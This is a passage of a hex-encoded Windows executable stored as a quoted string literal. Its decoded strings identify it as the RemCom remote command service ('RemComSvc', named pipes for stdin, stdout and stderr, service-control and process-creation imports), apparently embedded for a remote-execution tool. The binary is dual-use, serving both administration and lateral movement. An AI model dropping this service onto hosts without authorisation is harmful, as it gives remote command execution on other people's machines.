'cb000054cb00003ecb000028cb000014cb000000cb0000f0ca0000daca0000ccca0000' \ 'beca0000b2ca0000a4ca000098ca0000a0cb000088ca000010cd00001ecd00002ecd00' \ '003ecd000050cd000064cd000078cd000094cd0000b2cd0000c6cd0000dacd0000eccd' \ '0000facd000006ce000014ce00001ece00002ece000044ce00004cce00005ace000066' \ 'ce00007ece000096ce0000a6ce0000bcce0000d6ce0000eece000008cf00001ecf0000' \ '38cf00004acf000058cf00006acf000082cf000090cf00009ecf0000b8cf0000c8cf00' \ '00e2cf0000eecf0000f8cf000004d0000016d0000026d000004ed000005ad0000066d0' \ '000076d0000084d0000096d00000a6d00000b8d00000cad00000dcd00000f2d0000004' \ 'd1000014d1000024d1000030d1000044d1000054d1000064d100007ad100008ad10000' \ '0000000000000000000000000000000037304000774240002958400001594000c64240' \ '00000000000000000010a24000e8304000000000000000000000000000000000005265' \ '6d436f6d53766300000053657276696365004120736572766963652043616e6e6f7420' \ '62652073746172746564206469726563746c792e0a000052656d436f6d5f7374646572' \ '7200000052656d436f6d5f737464696e000000005c5c2e5c706970655c257325732564' \ '0052656d436f6d5f7374646f7574000000257300005c5c2e5c706970655c52656d436f' \ '6d5f636f6d6d756e696361746f6e0000000058f24000b0f24000456e636f6465506f69' \ '6e7465720000004b00450052004e0045004c00330032002e0044004c004c0000000000' \ '4465636f6465506f696e746572000000466c734672656500466c7353657456616c7565' \ '00466c7347657456616c756500466c73416c6c6f6300000000436f724578697450726f' \ '6365737300006d00730063006f007200650065002e0064006c006c000000050000c00b' \ '000000000000001d0000c00400000000000000960000c004000000000000008d0000c0' \ '08000000000000008e0000c008000000000000008f0000c00800000000000000900000' \ 'c00800000000000000910000c00800000000000000920000c008000000000000009300' \ '00c0080000000000000028006e0075006c006c00290000000000286e756c6c29000006' \ '0000060001000010000306000602100445454505050505053530005000000000282038' \ '5058070800373030575007000020200800000000086068606060600000787078787878' \ '08070800000700080808000008000800070800000072756e74696d65206572726f7220' \ '00000d0a0000544c4f5353206572726f720d0a00000053494e47206572726f720d0a00' \ '000000444f4d41494e206572726f720d0a000052363033340d0a416e206170706c6963' \ '6174696f6e20686173206d61646520616e20617474656d707420746f206c6f61642074' \ '686520432072756e74696d65206c69627261727920696e636f72726563746c792e0a50' \ '6c6561736520636f6e7461637420746865206170706c69636174696f6e277320737570' \ '706f7274207465616d20666f72206d6f726520696e666f726d6174696f6e2e0d0a0000' \ '0000000052363033330d0a2d20417474656d707420746f20757365204d53494c20636f' \ '64652066726f6d207468697320617373656d626c7920647572696e67206e6174697665' \ '20636f646520696e697469616c697a6174696f6e0a5468697320696e64696361746573' \ '20612062756720696e20796f7572206170706c69636174696f6e2e204974206973206d' \ '6f7374206c696b656c792074686520726573756c74206f662063616c6c696e6720616e' \ '204d53494c2d636f6d70696c656420282f636c72292066756e6374696f6e2066726f6d' \ '2061206e617469766520636f6e7374727563746f72206f722066726f6d20446c6c4d61' \ '696e2e0d0a000052363033320d0a2d206e6f7420656e6f75676820737061636520666f' \ '72206c6f63616c6520696e666f726d6174696f6e0d0a00000000000052363033310d0a' \ '2d20417474656d707420746f20696e697469616c697a652074686520435254206d6f72' \ '65207468616e206f6e63652e0a5468697320696e646963617465732061206275672069' \ '6e20796f7572206170706c69636174696f6e2e0d0a000052363033300d0a2d20435254' \ '206e6f7420696e697469616c697a65640d0a000052363032380d0a2d20756e61626c65' \ '20746f20696e697469616c697a6520686561700d0a0000000052363032370d0a2d206e' \ '6f7420656e6f75676820737061636520666f72206c6f77696f20696e697469616c697a' \ '6174696f6e0d0a0000000052363032360d0a2d206e6f7420656e6f7567682073706163' \ '6520666f7220737464696f20696e697469616c697a6174696f6e0d0a00000000523630' \ '32350d0a2d2070757265207669727475616c2066756e6374696f6e2063616c6c0d0a00' \ '000052363032340d0a2d206e6f7420656e6f75676820737061636520666f72205f6f6e' \ '657869742f617465786974207461626c650d0a0000000052363031390d0a2d20756e61' \ '626c6520746f206f70656e20636f6e736f6c65206465766963650d0a00000000523630' \ '31380d0a2d20756e65787065637465642068656170206572726f720d0a000000005236' \ '3031370d0a2d20756e6578706563746564206d756c7469746872656164206c6f636b20' \ '6572726f720d0a0000000052363031360d0a2d206e6f7420656e6f7567682073706163' \ '6520666f722074687265616420646174610d0a000d0a54686973206170706c69636174' \ '696f6e2068617320726571756573746564207468652052756e74696d6520746f207465' \ '726d696e61746520697420696e20616e20756e757375616c207761792e0a506c656173' \ '6520636f6e7461637420746865206170706c69636174696f6e277320737570706f7274' \ '207465616d20666f72206d6f726520696e666f726d6174696f6e2e0d0a000000523630' \ '30390d0a2d206e6f7420656e6f75676820737061636520666f7220656e7669726f6e6d' \ '656e740d0a0052363030380d0a2d206e6f7420656e6f75676820737061636520666f72' \ '20617267756d656e74730d0a00000052363030320d0a2d20666c6f6174696e6720706f' \ '696e7420737570706f7274206e6f74206c6f616465640d0a000000004d6963726f736f' \ '66742056697375616c20432b2b2052756e74696d65204c696272617279000000000a0a' \ '00002e2e2e003c70726f6772616d206e616d6520756e6b6e6f776e3e000052756e7469' \ '6d65204572726f72210a0a50726f6772616d3a20000000000000000102030405060708' \ '090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b' \ '2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e' \ '4f505152535455565758595a5b5c5d5e5f606162636465666768696a6b6c6d6e6f7071' \ '72737475767778797a7b7c7d7e7f000680808680818000001003868086828014050545' \ '4545858585050000303080508088000800282738505780000700373030505088000000' \ '2028808880800000006068606868680808077870707770700808000008000800070800' \ '000047657450726f6365737357696e646f7753746174696f6e00476574557365724f62' \ '6a656374496e666f726d6174696f6e410000004765744c617374416374697665506f70' \ '7570000047657441637469766557696e646f77004d657373616765426f784100555345' \ '5233322e444c4c00000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000002000200020002000200020' \ '0020002000200028002800280028002800200020002000200020002000200020002000' \ '2000200020002000200020002000200020004800100010001000100010001000100010' \ '0010001000100010001000100010008400840084008400840084008400840084008400' \ '1000100010001000100010001000810081008100810081008100010001000100010001' \ '0001000100010001000100010001000100010001000100010001000100010010001000' \ '1000100010001000820082008200820082008200020002000200020002000200020002' \ '0002000200020002000200020002000200020002000200020010001000100010002000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000020002000200020002000200020002000200068002800' \ '2800280028002000200020002000200020002000200020002000200020002000200020' \ '0020002000200048001000100010001000100010001000100010001000100010001000' \ '1000100084008400840084008400840084008400840084001000100010001000100010' \ '0010008101810181018101810181010101010101010101010101010101010101010101' \ '0101010101010101010101010101010101010101100010001000100010001000820182' \ '0182018201820182010201020102010201020102010201020102010201020102010201' \ '0201020102010201020102010201100010001000100020002000200020002000200020' \ '0020002000200020002000200020002000200020002000200020002000200020002000' \ '2000200020002000200020002000200020004800100010001000100010001000100010' \ '0010001000100010001000100010001000100014001400100010001000100010001400' \ '1000100010001000100010000101010101010101010101010101010101010101010101' \ '0101010101010101010101010101010101010101010101100001010101010101010101' \ '0101010102010201020102010201020102010201020102010201020102010201020102' \ '0102010201020102010201020102010201100002010201020102010201020102010201' \ '010100000000808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c' \ '9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebf' \ 'c0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2' \ 'e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff000102030405' \ '060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728' \ '292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f406162636465666768696a6b' \ '6c6d6e6f707172737475767778797a5b5c5d5e5f606162636465666768696a6b6c6d6e' \ '6f707172737475767778797a7b7c7d7e7f808182838485868788898a8b8c8d8e8f9091' \ '92939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4' \ 'b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7' \ 'd8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fa' \ 'fbfcfdfeff808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d' \ '9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0' \ 'c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3' \ 'e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff00010203040506' \ '0708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f20212223242526272829' \ '2a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c' \ '4d4e4f505152535455565758595a5b5c5d5e5f604142434445464748494a4b4c4d4e4f' \ '505152535455565758595a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192' \ '939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5' \ 'b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8' \ 'd9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafb' \ 'fcfdfeff48483a6d6d3a737300000000646464642c204d4d4d4d2064642c2079797979' \ '004d4d2f64642f797900000000504d0000414d0000446563656d626572000000004e6f' \ '76656d626572000000004f63746f6265720053657074656d6265720000004175677573' \ '7400004a756c79000000004a756e6500000000417072696c0000004d61726368000000' \ '4665627275617279000000004a616e7561727900446563004e6f76004f637400536570' \ '00417567004a756c004a756e004d617900417072004d617200466562004a616e005361' \ '7475726461790000000046726964617900005468757273646179000000005765646e65' \ '7364617900000054756573646179004d6f6e646179000053756e646179000053617400' \ '467269005468750057656400547565004d6f6e0053756e000000000053756e4d6f6e54' \ '75655765645468754672695361740000004a616e4665624d61724170724d61794a756e' \ '4a756c4175675365704f63744e6f7644656300000000434f4e4f555424004800000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '000000000000000000000000000000000000000000e04000d0c4400003000000000000' \ '0000000000502b0000585d0000808f0000000000000000000000000000000000000000' \ '0000feffffff00000000d4ffffff00000000feffffffe3184000f718400000000000fe' \ 'ffffff00000000d4ffffff00000000feffffff00000000cf1a400000000000feffffff' \ '00000000ccffffff00000000feffffff681d40007c1d400000000000feffffff000000' \ '00d4ffffff00000000feffffff0000000029214000feffffff0000000038214000feff' \ 'ffff00000000d8ffffff00000000feffffff00000000eb224000feffffff00000000f7' \ '224000feffffff00000000d8ffffff00000000feffffff1b2640002f26400000000000' \ 'feffffff00000000c8ffffff00000000feffffff00000000d528400000000000feffff' \ 'ff00000000d4ffffff00000000feffffff00000000bd2d400000000000feffffff0000' \ '0000d4ffffff00000000feffffffe2414000fe41400000000000feffffff000000008c' \ 'ffffff00000000feffffff5f4b4000634b400000000000feffffff00000000d4ffffff' \ '00000000feffffff00000000034e400000000000feffffff00000000d4ffffff000000' \ '00feffffff000000005851400000000000feffffff00000000d4ffffff00000000feff' \ 'ffff000000002254400000000000feffffff00000000ccffffff00000000feffffff00' \ '000000f057400000000000feffffff00000000d4ffffff00000000feffffff00000000' \ '6859400000000000feffffff00000000d8ffffff00000000feffffffc6594000ca5940' \ '0000000000feffffff00000000c0ffffff00000000feffffff00000000c05b40000000' \ '0000feffffff00000000d0ffffff00000000feffffff505c4000675c400000000000fe' \ 'ffffff00000000d4ffffff00000000feffffff000000002569400000000000feffffff' \ '00000000d4ffffff00000000feffffff00000000ef6a400000000000feffffff000000' \ '00d0ffffff00000000feffffff00000000546c400000000000feffffff00000000d0ff' \ 'ffff00000000feffffff00000000c76d400000000000feffffff00000000ccffffff00' \ '000000feffffff00000000516f400000000000000000001d6f4000feffffff00000000' \ 'ccffffff00000000feffffff000000008974400000000000feffffff00000000d0ffff' \ 'ff00000000feffffff00000000987c400000000000feffffff00000000d0ffffff0000' \ '0000feffffff000000002c8e400000000000feffffff00000000d4ffffff00000000fe' \ 'ffffff00000000ed94400000000000feffffff00000000d0ffffff00000000feffffff' \ '00000000cf95400000000000feffffff00000000d4ffffff00000000feffffff000000' \ '00c299400000000000feffffff00000000d0ffffff00000000feffffff00000000b6a1' \ '40003cc900000000000000000000c4cb00003cb0000000c90000000000000000000002' \ 'cd000000b000000000000000000000000000000000000000000000c6cc0000a8cc0000' \ '8acc000076cc000060cc000044cc000038cc00002ecc00001ccc00000ccc0000f6cb00' \ '00e6cb0000d2cb0000e2cc00000000000094cb00007ecb0000accb000066cb000054cb' \ '00003ecb000028cb000014cb000000cb0000f0ca0000daca0000ccca0000beca0000b2' \ 'ca0000a4ca000098ca0000a0cb000088ca000010cd00001ecd00002ecd00003ecd0000' \ '50cd000064cd000078cd000094cd0000b2cd0000c6cd0000dacd0000eccd0000facd00' \ '0006ce000014ce00001ece00002ece000044ce00004cce00005ace000066ce00007ece' \ '000096ce0000a6ce0000bcce0000d6ce0000eece000008cf00001ecf000038cf00004a' \ 'cf000058cf00006acf000082cf000090cf00009ecf0000b8cf0000c8cf0000e2cf0000' \ 'eecf0000f8cf000004d0000016d0000026d000004ed000005ad0000066d0000076d000' \ '0084d0000096d00000a6d00000b8d00000cad00000dcd00000f2d0000004d1000014d1' \ '000024d1000030d1000044d1000054d1000064d100007ad100008ad1000000000000e6' \ '014765744c6173744572726f720000d3035365744576656e7400004300436c6f736548' \ '616e646c6500fd024c6f63616c4672656500f9024c6f63616c416c6c6f63000033034f' \ '70656e50726f6365737300aa0147657443757272656e7450726f636573734964007200' \ '4372656174654576656e744100005600436f6e6e6563744e616d65645069706500008f' \ '004372656174654e616d656450697065410000c50147657445786974436f646550726f' \ '636573730000640457616974466f7253696e676c654f626a6563740094004372656174' \ '6550726f63657373410000bc02496e7465726c6f636b656444656372656d656e740000' \ 'cd00446973636f6e6e6563744e616d656450697065008d04577269746546696c650068' \ '035265616446696c650000c002496e7465726c6f636b6564496e6372656d656e740000' \ '4b45524e454c33322e646c6c0000ba02536574536572766963655374617475730000d6' \ '0044656c65746553657276696365005300436c6f73655365727669636548616e646c65' \ '0000f4014f70656e53657276696365410000f2014f70656e53434d616e616765724100' \ '001a0146726565536964000201457175616c53696400001f00416c6c6f63617465416e' \ '64496e697469616c697a6553696400005401476574546f6b656e496e666f726d617469' \ '6f6e00f1014f70656e50726f63657373546f6b656e00007f0252656769737465725365' \ '72766963654374726c48616e646c65724100c102537461727453657276696365437472' \ '6c446973706174636865724100b002536574536563757269747944657363726970746f' \ '724461636c007101496e697469616c697a65536563757269747944657363726970746f' \ '72000041445641504933322e646c6c000005014578697454687265616400008d035265' \ '73756d655468726561640000a30043726561746554687265616400006f01476574436f' \ '6d6d616e644c696e6541002d045465726d696e61746550726f636573730000a9014765' \ '7443757272656e7450726f63657373003e04556e68616e646c6564457863657074696f' \ '6e46696c74657200001504536574556e68616e646c6564457863657074696f6e46696c' \ '74657200d1024973446562756767657250726573656e7400f9014765744d6f64756c65' \ '48616e646c65570000200247657450726f634164647265737300003404546c73476574' \ '56616c7565003204546c73416c6c6f6300003504546c7353657456616c756500330454' \ '6c734672656500ec035365744c6173744572726f720000ad0147657443757272656e74' \ '546872656164496400002104536c6565700004014578697450726f6365737300a10248' \ '656170467265650000d900456e746572437269746963616c53656374696f6e0000ef02' \ '4c65617665437269746963616c53656374696f6e00003b0247657453746448616e646c' \ '650000f4014765744d6f64756c6546696c654e616d654100004a0146726565456e7669' \ '726f6e6d656e74537472696e67734100bf01476574456e7669726f6e6d656e74537472' \ '696e6773004b0146726565456e7669726f6e6d656e74537472696e677357007a045769' \ '646543686172546f4d756c74694279746500c101476574456e7669726f6e6d656e7453' \ '7472696e6773570000e80353657448616e646c65436f756e740000d70147657446696c' \ '655479706500390247657453746172747570496e666f4100be0044656c657465437269' \ '746963616c53656374696f6e009f024865617043726561746500005704566972747561' \ '6c467265650054035175657279506572666f726d616e6365436f756e74657200660247' \ '65745469636b436f756e7400004f0247657453797374656d54696d65417346696c6554' \ '696d65005b014765744350496e666f005201476574414350000013024765744f454d43' \ '500000db02497356616c6964436f64655061676500f1024c6f61644c69627261727941' \ '0000b502496e697469616c697a65437269746963616c53656374696f6e416e64537069' \ '6e436f756e7400920352746c556e77696e64009d0248656170416c6c6f630054045669' \ '727475616c416c6c6f630000a402486561705265416c6c6f6300df0353657446696c65' \ '506f696e74657200008301476574436f6e736f6c65435000009501476574436f6e736f' \ '6c654d6f64650000e8014765744c6f63616c65496e666f4100003d0247657453747269' \ '6e67547970654100001a034d756c746942797465546f57696465436861720040024765' \ '74537472696e6754797065570000e1024c434d6170537472696e67410000e3024c434d' \ '6170537472696e67570000a6024865617053697a6500004101466c75736846696c6542' \ '7566666572730000fc0353657453746448616e646c65000082045772697465436f6e73' \ '6f6c6541009901476574436f6e736f6c654f7574707574435000008c04577269746543' \ '6f6e736f6c655700780043726561746546696c65410000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000004ee640bbb119bf44000000000000' \ '000001000000ffffffffffffffff032940000300000007000000780000000a00000001' \ '0000001600000002000000020000000300000002000000040000001800000005000000' \ '0d0000000600000009000000070000000c000000080000000c000000090000000c0000' \ '000a000000070000000b000000080000000c000000160000000d000000160000000f00' \ '000002000000100000000d00000011000000120000001200000002000000210000000d' \ '0000003500000002000000410000000d00000043000000020000005000000011000000' \ '520000000d000000530000000d0000005700000016000000590000000b0000006c0000' \ '000d0000006d00000020000000700000001c0000007200000009000000060000001600' \ '0000800000000a000000810000000a0000008200000009000000830000001600000084' \ '0000000d00000091000000290000009e0000000d000000a100000002000000a4000000' \ '0b000000a70000000d000000b700000011000000ce00000002000000d70000000b0000' \ '00180700000c0000000c0000000800000000fe40000000000000fe4000010100000000' \ '0000000000000010000000000000000000000000000000000000020000000100000000' \ '0000000000000000000000000000000000000000000000020000000200000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '00000000000000000000000000000000000000000000000000000088b3400078b34000' \ '0200000018b9400008000000ecb8400009000000c0b840000a00000028b84000100000' \ '00fcb7400011000000ccb7400012000000a8b74000130000007cb740001800000044b7' \ '4000190000001cb740001a000000e4b640001b000000acb640001c00000084b640001e' \ '00000064b640001f00000000b6400020000000c8b5400021000000d0b4400022000000' \ '30b440007800000020b440007900000010b440007a00000000b44000fc000000fcb340' \ '00ff000000ecb34000ffffffff800a0000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000001000000000000000000000000100000000000000010000000000000000000000' \ '0000000001000000000000000100000000000000000000000000000001000000000000' \ '0001000000000000000100000000000000000000000000000001000000000000000000' \ '0000000000000100000000000000010000000000000001000000000000000000000000' \ '0000000100000000000000010000000000000001000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000004be4000000000004300000000000000' \ '0100000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '00000000000000000000000000000000000050e6400000000000000000000000000050' \ 'e6400000000000000000000000000050e6400000000000000000000000000050e64000' \ '00000000000000000000000050e6400000000000000000000000000001000000010000' \ '0000000000000000000000000058ed4000000000000000000000bc400088c0400008c2' \ '400098ec400058e640000100000058e6400040e7400000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000101010101010101010101010101010101010101010101010' \ '1010000000000000202020202020202020202020202020202020202020202020202000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '000000000000000000000000000000000000000000006162636465666768696a6b6c6d' \ '6e6f707172737475767778797a0000000000004142434445464748494a4b4c4d4e4f50' \ '5152535455565758595a00000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000101010101010101010101010101010101010101010101010101000000000000020' \ '2020202020202020202020202020202020202020202020202000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '00000000000000000000000000000000000000006162636465666768696a6b6c6d6e6f' \ '707172737475767778797a0000000000004142434445464748494a4b4c4d4e4f505152' \ '535455565758595a000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0040e7400001020408a4030000608279822100000000000000a6df000000000000a1a5' \ '000000000000819fe0fc00000000407e80fc00000000a8030000c1a3daa32000000000' \ '0000000000000000000000000000000000000081fe00000000000040fe000000000000' \ 'b5030000c1a3daa320000000000000000000000000000000000000000000000081fe00' \ '000000000041fe000000000000b6030000cfa2e4a21a00e5a2e8a25b00000000000000' \ '0000000000000000000081fe000000000000407ea1fe000000005105000051da5eda20' \ '005fda6ada32000000000000000000000000000000000081d3d8dee0f90000317e81fe' \ '000000003d8e40003d8e40003d8e40003d8e40003d8e40003d8e40003d8e40003d8e40' \ '003d8e40003d8e4000feffffff0000000000bc400002be400030c440002cc4400028c4' \ '400024c4400020c440001cc4400018c4400010c4400008c4400000c44000f4c34000e8' \ 'c34000e0c34000d4c34000d0c34000ccc34000c8c34000c4c34000c0c34000bcc34000' \ 'b8c34000b4c34000b0c34000acc34000a8c34000a4c340009cc3400090c3400088c340' \ '0080c34000c0c3400078c3400070c3400068c340005cc3400054c3400048c340003cc3' \ '400038c3400034c3400028c3400014c3400008c3400009040000010000000000000098' \ 'ec40002e00000054ed4000d8fb4000d8fb4000d8fb4000d8fb4000d8fb4000d8fb4000' \ 'd8fb4000d8fb4000d8fb40007f7f7f7f7f7f7f7f58ed4000010000002e000000010000' \ '0000000000000000000300000020059319000000000000000000000000000000000000' \ '00000000000002000000000000008070000001000000f0f1ffff000000005053540000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000005044540000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '000000000000000000000000000000000000d8ed400018ee4000ffffffff0000000000' \ '000000ffffffff00000000000000000000000000000000fefffffffeffffffffffffff' \ '1e0000003b0000005a0000007800000097000000b5000000d4000000f3000000110100' \ '00300100004e0100006d010000ffffffff1e0000003a00000059000000770000009600' \ '0000b4000000d3000000f2000000100100002f0100004d0100006c0100000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000400000000' \ '0001001800000018000080000000000000000004000000000001000100000030000080' \ '000000000000000004000000000001000904000048000000581001005a010000e40400' \ '00000000003c617373656d626c7920786d6c6e733d2275726e3a736368656d61732d6d' \ '6963726f736f66742d636f6d3a61736d2e763122206d616e696665737456657273696f' \ '6e3d22312e30223e0d0a20203c7472757374496e666f20786d6c6e733d2275726e3a73' \ '6368656d61732d6d6963726f736f66742d636f6d3a61736d2e7633223e0d0a20202020' \ '3c73656375726974793e0d0a2020202020203c72657175657374656450726976696c65' \ '6765733e0d0a20202020202020203c726571756573746564457865637574696f6e4c65' \ '76656c206c6576656c3d226173496e766f6b6572222075694163636573733d2266616c' \ '7365223e3c2f726571756573746564457865637574696f6e4c6576656c3e0d0a202020' \ '2020203c2f72657175657374656450726976696c656765733e0d0a202020203c2f7365' \ '6375726974793e0d0a20203c2f7472757374496e666f3e0d0a3c2f617373656d626c79' \ '3e504150414444494e47585850414444494e4750414444494e47585850414444494e47' \ '50414444494e47585850414444494e4750414444494e47585850414444494e47504144' \ '44494e47585850414400100000a00100000d301e30253032303d30423047304e305830' \ '5e3064306a30703077309c30a130aa30b130b730be30c330c930d230d730de30e830f7' \ '300b31443154315e3171317d319131a231be31ca31ff3172328432a732c332cc321433' \ '19331f33293333333d33433349334f3355335a3363336a3374337a3380338a3398339f' \ '33a433cd33d433fc330e34403450347c3484348934ac34b134b634c834cd34d234dd34' \ 'f8341235323550357735aa350736653689369136de36ec36f2361b375d3764376b3770' \ '3776377c3785378c37a937b137ef37063815381d383638413849385d3864386c387b38' \ '84389438ae38bd38c53830393739583960397039e039f039003a0b3a363ae33aee3aa0' \ '3b323c573c683c6f3c753c873c8f3c9a3ceb3cf03cfa3c343d393d403d463dbc3dc23d' \ 'c83dce3dd43dda3de13de83def3df63dfd3d043e0b3e133e1b3e233e2f3e383e3d3e43' \ '3e4d3e563e613e6d3e723e823e873e8d3e933ea93eb03ebe3ec43ecf3edb3ef03ef73e' \ '0b3f123f393f3f3f4a3f563f6b3f723f863f8d3fa53fb63fbc3fc73fd13fd73fe33ff2' \ '3ff83f000000200000400100000d301e302a3038303e304a3050305d3067306e308630' \ '95309c30a930cc30e130073147314d3177317d319931b131d731513274327e32b632be' \ '320a331a3320332c333233423348335d336b3376337d3398339d33a533ab33b233b833' \ 'bf33c533cd33d433d933e133ea33f633fb33003406340a34103415341b3420342f3445' \ '34503455346034653470347534823490349634a334c334c934e53498359d35af35cd35' \ 'e135e7355b3664369136ac36b236bb36c236e43643374b375e3769376e377e3788378f' \ '379a37a337b937c437de37ea37f23702381738573864388e3893389e38a338c1387239' \ '7f39a1391a3a203a393a3f3ae93a063b623b3c3c443c5c3c743ccb3ce93c053d283d3b' \ '3d6a3d7c3dcb3dd13de23d0f3e183e243e5b3e643e703ea93eb23ebe3edd3eef3ec13f' \ 'cb3fd83ff33ffa3f0000003000006c000000123032303830523061306e307a308a3091' \ '30a030ac30b930dd30ef30fd3012311c314231753184318d31b131e03122323432e032' \ 'e832fd320833ef339134af34d534353548356335ae389e39283b573b7c3b5f3d5b3f5f' \ '3f633f673f6b3f6f3f733f773f00400000dc0000007f308630c8317d32c732cd32eb32' \ '22333a3345336933723379338233c233c733ef33143439344c34643476349a34ba34c9' \ '3401350b355b356635703581358c353f37503758375e3763376937d537db37f137fc37' \ '13381f382c3833386a38b938cc38fe381739253939395a3960399239e939f139313a3b' \ '3a633a7c3abd3aed3aff3a513b573b7a3b7f3ba03ba53bd93bde3bec3bfb3b1e3c2b3c' \ '373c3f3c473c533c773c7f3c8a3c973c9e3ca83cd23ce03ce63c093d103d293d3d3d43' \ '3d4c3d5f3d833d183e383e573e1c3f463f913fdd3f000000500000c00000002c307430' \ 'da30f13002313e31c63103321a328d339e33d833e533ef33fd330634103444344f3459' \ '3472347c348f34b334ea341f353235a235bf3507367336923607371337263738375337' \ '5b3763377a379337af37b837be37c737cc37db3702382b383c3852385d38d738f03819' \ '391e3935398d39a939e039eb39f939fe39033a083a183a473a553a9c3aa13ae63aeb3a' \ 'f23af73afe3a033b723b7b3b813b0b3c1a3c293c323c473c773c983ca53cdd3ce93cf5' \ '3d223e273e00600000b80000006a3078307e3098309d30ac30b530c230cd30df30f230' \ 'fd30033109310e31173134313a3145314a3152315831623169317d3184318a3198319f' \ 